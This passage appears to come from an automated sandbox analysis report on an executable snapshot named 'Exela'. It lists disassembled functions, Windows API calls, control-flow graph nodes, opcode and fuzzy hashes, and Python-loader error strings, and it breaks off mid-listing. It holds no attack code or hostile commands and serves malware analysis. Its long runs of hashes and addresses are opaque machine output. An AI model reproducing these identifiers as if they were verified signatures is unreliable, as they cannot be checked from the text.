                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                    • API String ID: 2050909247-2813020118
                                                                                                    • Opcode ID: 619b1d8a1a59d0c7b8dcbaa9966dc471b2ceb069a6157a385d228633a1f186c8
                                                                                                    • Instruction ID: 18baeaa694f97a44c889729e513fec92477014abfdaf4d8995048c13593bb700
                                                                                                    • Opcode Fuzzy Hash: 619b1d8a1a59d0c7b8dcbaa9966dc471b2ceb069a6157a385d228633a1f186c8
                                                                                                    • Instruction Fuzzy Hash: 2D51B322A0876249FA60BB11A8427BAE2D1BF85794FCC4275EE4D477D5EF3CE905C720
                                                                                                    Function 00007FF75AE936B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(?,00007FF75AE93804), ref: 00007FF75AE936E1
                                                                                                    • GetLastError.KERNEL32(?,00007FF75AE93804), ref: 00007FF75AE936EB
                                                                                                      • Part of subcall function 00007FF75AE92C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AE93706,?,00007FF75AE93804), ref: 00007FF75AE92C9E
                                                                                                      • Part of subcall function 00007FF75AE92C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF75AE93706,?,00007FF75AE93804), ref: 00007FF75AE92D63
                                                                                                      • Part of subcall function 00007FF75AE92C50: MessageBoxW.USER32 ref: 00007FF75AE92D99
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                    • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                    • API String ID: 3187769757-2863816727
                                                                                                    • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                    • Instruction ID: f76858c276dbdf7e7f1cb10ce940f0214e8e4bf1483fa9fa06be43151ebf1972
                                                                                                    • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                    • Instruction Fuzzy Hash: 7521C751B1C76395FA20B724E8177BAA250BF88744FC842B6E55DC25E5EE3CE905C320
                                                                                                    Function 00007FF75AEABACC Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 689 7ff75aeabacc-7ff75aeabaf2 690 7ff75aeabaf4-7ff75aeabb08 call 7ff75aea4f58 call 7ff75aea4f78 689->690 691 7ff75aeabb0d-7ff75aeabb11 689->691 705 7ff75aeabefe 690->705 692 7ff75aeabee7-7ff75aeabef3 call 7ff75aea4f58 call 7ff75aea4f78 691->692 693 7ff75aeabb17-7ff75aeabb1e 691->693 711 7ff75aeabef9 _invalid_parameter_noinfo 692->711 693->692 697 7ff75aeabb24-7ff75aeabb52 693->697 697->692 700 7ff75aeabb58-7ff75aeabb5f 697->700 703 7ff75aeabb61-7ff75aeabb73 call 7ff75aea4f58 call 7ff75aea4f78 700->703 704 7ff75aeabb78-7ff75aeabb7b 700->704 703->711 708 7ff75aeabb81-7ff75aeabb87 704->708 709 7ff75aeabee3-7ff75aeabee5 704->709 710 7ff75aeabf01-7ff75aeabf18 705->710 708->709 713 7ff75aeabb8d-7ff75aeabb90 708->713 709->710 711->705 713->703 715 7ff75aeabb92-7ff75aeabbb7 713->715 716 7ff75aeabbb9-7ff75aeabbbb 715->716 717 7ff75aeabbea-7ff75aeabbf1 715->717 719 7ff75aeabbe2-7ff75aeabbe8 716->719 720 7ff75aeabbbd-7ff75aeabbc4 716->720 721 7ff75aeabbc6-7ff75aeabbdd call 7ff75aea4f58 call 7ff75aea4f78 _invalid_parameter_noinfo 717->721 722 7ff75aeabbf3-7ff75aeabc1b call 7ff75aead66c call 7ff75aeaa9b8 * 2 717->722 724 7ff75aeabc68-7ff75aeabc7f 719->724 720->719 720->721 740 7ff75aeabd70 721->740 748 7ff75aeabc38-7ff75aeabc63 call 7ff75aeac2f4 722->748 749 7ff75aeabc1d-7ff75aeabc33 call 7ff75aea4f78 call 7ff75aea4f58 722->749 727 7ff75aeabc81-7ff75aeabc89 724->727 728 7ff75aeabcfa-7ff75aeabd04 call 7ff75aeb398c 724->728 727->728 732 7ff75aeabc8b-7ff75aeabc8d 727->732 738 7ff75aeabd0a-7ff75aeabd1f 728->738 739 7ff75aeabd8e 728->739 732->728 736 7ff75aeabc8f-7ff75aeabca5 732->736 736->728 741 7ff75aeabca7-7ff75aeabcb3 736->741 738->739 744 7ff75aeabd21-7ff75aeabd33 GetConsoleMode 738->744 743 7ff75aeabd93-7ff75aeabdb3 ReadFile 739->743 745 7ff75aeabd73-7ff75aeabd7d call 7ff75aeaa9b8 740->745 741->728 746 7ff75aeabcb5-7ff75aeabcb7 741->746 750 7ff75aeabdb9-7ff75aeabdc1 743->750 751 7ff75aeabead-7ff75aeabeb6 GetLastError 743->751 744->739 752 7ff75aeabd35-7ff75aeabd3d 744->752 745->710 746->728 754 7ff75aeabcb9-7ff75aeabcd1 746->754 748->724 749->740 750->751 756 7ff75aeabdc7 750->756 759 7ff75aeabed3-7ff75aeabed6 751->759 760 7ff75aeabeb8-7ff75aeabece call 7ff75aea4f78 call 7ff75aea4f58 751->760 752->743 758 7ff75aeabd3f-7ff75aeabd61 ReadConsoleW 752->758 754->728 762 7ff75aeabcd3-7ff75aeabcdf 754->762 767 7ff75aeabdce-7ff75aeabde3 756->767 769 7ff75aeabd82-7ff75aeabd8c 758->769 770 7ff75aeabd63 GetLastError 758->770 764 7ff75aeabd69-7ff75aeabd6b call 7ff75aea4eec 759->764 765 7ff75aeabedc-7ff75aeabede 759->765 760->740 762->728 763 7ff75aeabce1-7ff75aeabce3 762->763 763->728 772 7ff75aeabce5-7ff75aeabcf5 763->772 764->740 765->745 767->745 774 7ff75aeabde5-7ff75aeabdf0 767->774 769->767 770->764 772->728 778 7ff75aeabdf2-7ff75aeabe0b call 7ff75aeab6e4 774->778 779 7ff75aeabe17-7ff75aeabe1f 774->779 786 7ff75aeabe10-7ff75aeabe12 778->786 782 7ff75aeabe21-7ff75aeabe33 779->782 783 7ff75aeabe9b-7ff75aeabea8 call 7ff75aeab524 779->783 787 7ff75aeabe35 782->787 788 7ff75aeabe8e-7ff75aeabe96 782->788 783->786 786->745 790 7ff75aeabe3a-7ff75aeabe41 787->790 788->745 791 7ff75aeabe43-7ff75aeabe47 790->791 792 7ff75aeabe7d-7ff75aeabe88 790->792 793 7ff75aeabe63 791->793 794 7ff75aeabe49-7ff75aeabe50 791->794 792->788 796 7ff75aeabe69-7ff75aeabe79 793->796 794->793 795 7ff75aeabe52-7ff75aeabe56 794->795 795->793 797 7ff75aeabe58-7ff75aeabe61 795->797 796->790 798 7ff75aeabe7b 796->798 797->796 798->788
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: ba46bac31fe72f1dd681b3566344db0dd8f54c3f22ac6e326a6392c95ac81308
                                                                                                    • Instruction ID: ac07e26ee97088d2eaade3e0b7c6704b1d9fdec79bbd64e4776d29d5b95a4315
                                                                                                    • Opcode Fuzzy Hash: ba46bac31fe72f1dd681b3566344db0dd8f54c3f22ac6e326a6392c95ac81308
                                                                                                    • Instruction Fuzzy Hash: BDC1B4229087A691F760BB15944A2BDB794FF81B80FDD41B1EA4E07791CF7CEC558720
                                                                                                    Function 00007FF75AE96350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcess
                                                                                                    • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                    • API String ID: 2050909247-2434346643
                                                                                                    • Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                    • Instruction ID: 42dc910226e0dc196919365218f4cb73e4c3f8ff7adc36aeca7154002c201508
                                                                                                    • Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
                                                                                                    • Instruction Fuzzy Hash: 27419231A1C79795FA11FB60E4566E9A310FF88384FC80172EA5C53296EF3CE905C760
                                                                                                    Function 00007FF75AEA5698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279662727-0
                                                                                                    • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                    • Instruction ID: 1b27b1b376e12331efcd963d3d0276092d520de5a1136c021d3708d197bb6d75
                                                                                                    • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                    • Instruction Fuzzy Hash: E341C422D1879283F350BB20961A379A360FF94764F549375EA9C03AD2DF7CA5E18720
                                                                                                    Function 00007FF75AE9CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 3251591375-0
                                                                                                    • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                    • Instruction ID: 44aaf1e4e1737e217bb3da66a54c00683d13b118261384aea55578a273af45da
                                                                                                    • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                    • Instruction Fuzzy Hash: CD313B21E083734DFA64BB259467BB9A791AF81384FCC44B4D94E672D3DE2CA805C271
                                                                                                    Function 00007FF75AEA01AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1121 7ff75aea01ac-7ff75aea01d9 1122 7ff75aea01f5 1121->1122 1123 7ff75aea01db-7ff75aea01de 1121->1123 1124 7ff75aea01f7-7ff75aea020b 1122->1124 1123->1122 1125 7ff75aea01e0-7ff75aea01e3 1123->1125 1126 7ff75aea01e5-7ff75aea01ea call 7ff75aea4f78 1125->1126 1127 7ff75aea020c-7ff75aea020f 1125->1127 1135 7ff75aea01f0 _invalid_parameter_noinfo 1126->1135 1129 7ff75aea021f-7ff75aea0223 1127->1129 1130 7ff75aea0211-7ff75aea021d 1127->1130 1133 7ff75aea0225-7ff75aea022f call 7ff75aeba540 1129->1133 1134 7ff75aea0237-7ff75aea023a 1129->1134 1130->1129 1132 7ff75aea024a-7ff75aea0253 1130->1132 1138 7ff75aea0255-7ff75aea0258 1132->1138 1139 7ff75aea025a 1132->1139 1133->1134 1134->1126 1137 7ff75aea023c-7ff75aea0248 1134->1137 1135->1122 1137->1126 1137->1132 1140 7ff75aea025f-7ff75aea027e 1138->1140 1139->1140 1142 7ff75aea0284-7ff75aea0292 1140->1142 1143 7ff75aea03c5-7ff75aea03c8 1140->1143 1144 7ff75aea0294-7ff75aea029b 1142->1144 1145 7ff75aea030a-7ff75aea030f 1142->1145 1143->1124 1144->1145 1146 7ff75aea029d 1144->1146 1147 7ff75aea0311-7ff75aea031d 1145->1147 1148 7ff75aea037c-7ff75aea037f call 7ff75aeabf1c 1145->1148 1149 7ff75aea03f0 1146->1149 1150 7ff75aea02a3-7ff75aea02ad 1146->1150 1151 7ff75aea031f-7ff75aea0326 1147->1151 1152 7ff75aea0329-7ff75aea032f 1147->1152 1158 7ff75aea0384-7ff75aea0387 1148->1158 1157 7ff75aea03f5-7ff75aea0400 1149->1157 1154 7ff75aea02b3-7ff75aea02b9 1150->1154 1155 7ff75aea03cd-7ff75aea03d1 1150->1155 1151->1152 1152->1155 1156 7ff75aea0335-7ff75aea0352 call 7ff75aeaa4ec call 7ff75aeabacc 1152->1156 1160 7ff75aea02f1-7ff75aea0305 1154->1160 1161 7ff75aea02bb-7ff75aea02be 1154->1161 1162 7ff75aea03e0-7ff75aea03eb call 7ff75aea4f78 1155->1162 1163 7ff75aea03d3-7ff75aea03db call 7ff75aeba540 1155->1163 1179 7ff75aea0357-7ff75aea0359 1156->1179 1157->1124 1158->1157 1159 7ff75aea0389-7ff75aea038c 1158->1159 1159->1155 1165 7ff75aea038e-7ff75aea03a5 1159->1165 1166 7ff75aea03ac-7ff75aea03b7 1160->1166 1167 7ff75aea02c0-7ff75aea02c6 1161->1167 1168 7ff75aea02dc-7ff75aea02e7 call 7ff75aea4f78 _invalid_parameter_noinfo 1161->1168 1162->1135 1163->1162 1165->1166 1166->1142 1172 7ff75aea03bd 1166->1172 1173 7ff75aea02d2-7ff75aea02d7 call 7ff75aeba540 1167->1173 1174 7ff75aea02c8-7ff75aea02d0 call 7ff75aeb9ea0 1167->1174 1182 7ff75aea02ec 1168->1182 1172->1143 1173->1168 1174->1182 1184 7ff75aea035f 1179->1184 1185 7ff75aea0405-7ff75aea040a 1179->1185 1182->1160 1184->1149 1186 7ff75aea0365-7ff75aea037a 1184->1186 1185->1157 1186->1166
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                    • Instruction ID: d606099b4e6e67df70ef816ca1599a51ed9bd395bbdcec814ad5e0d787070884
                                                                                                    • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                    • Instruction Fuzzy Hash: 35512821B0926246F766BE29940A67AE3C1AF44BA4F9C4774DE6D077C6CF3CD5018630
                                                                                                    Function 00007FF75AEAC1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 2976181284-0
                                                                                                    • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                    • Instruction ID: 6d79647a6174d8ed0cfcc5369f20650a4ce3914ca626938b546aec1e19bdeabb
                                                                                                    • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                    • Instruction Fuzzy Hash: 2C110461718B6181EA10BB65A809069A361FF81BF4F9C4371EE7D4B7D8CE3CD4018700
                                                                                                    Function 00007FF75AEAA9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9CE
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF75AEB2D92,?,?,?,00007FF75AEB2DCF,?,?,00000000,00007FF75AEB3295,?,?,?,00007FF75AEB31C7), ref: 00007FF75AEAA9D8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 485612231-0
                                                                                                    • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                    • Instruction ID: 3ba9d389facac25f79b385da1513dc1d9f226e2729bddc8d2a4f4d0838436265
                                                                                                    • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                    • Instruction Fuzzy Hash: 6EE04F50E0831642FF187BB2A45B13891906F84741B8C81B4C91D462A1DE2C68858220
                                                                                                    Function 00007FF75AEAABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(?,?,?,00007FF75AEAAA45,?,?,00000000,00007FF75AEAAAFA), ref: 00007FF75AEAAC36
                                                                                                    • GetLastError.KERNEL32(?,?,?,00007FF75AEAAA45,?,?,00000000,00007FF75AEAAAFA), ref: 00007FF75AEAAC40
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 918212764-0
                                                                                                    • Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                    • Instruction ID: 477d21ec7612bd668772126a739409cb2da3a58a0e2e06d1601d3fed8709d5b9
                                                                                                    • Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
                                                                                                    • Instruction Fuzzy Hash: 3121A821F1C76242FFA47761A45B27D96829F84790FCC42B9EA2E477D1CE6CE4858320
                                                                                                    Function 00007FF75AEABF1C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AED1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094758116.00007FF75AED4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_77_2_7ff75ae90000_Exela.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                    • Instruction ID: c1988d28e1002e279d4d484cac0a04103f6ece80cb91bd8ce46e33ab9a492427
                                                                                                    • Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
                                                                                                    • Instruction Fuzzy Hash: 8341F532A0821187FA34BB55E55A279F3A0EF55B40F9C4171EA8E87691CF2DE802CB61
                                                                                                    Function 00007FF75AE97F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000004D.00000002.2094614717.00007FF75AE91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF75AE90000, based on PE: true
                                                                                                    • Associated: 0000004D.00000002.2094591065.00007FF75AE90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094650034.00007FF75AEBB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                    • Associated: 0000004D.00000002.2094682015.00007FF75AECE000.00000004.00000001.01000000.0000000C.sdmpDownload File
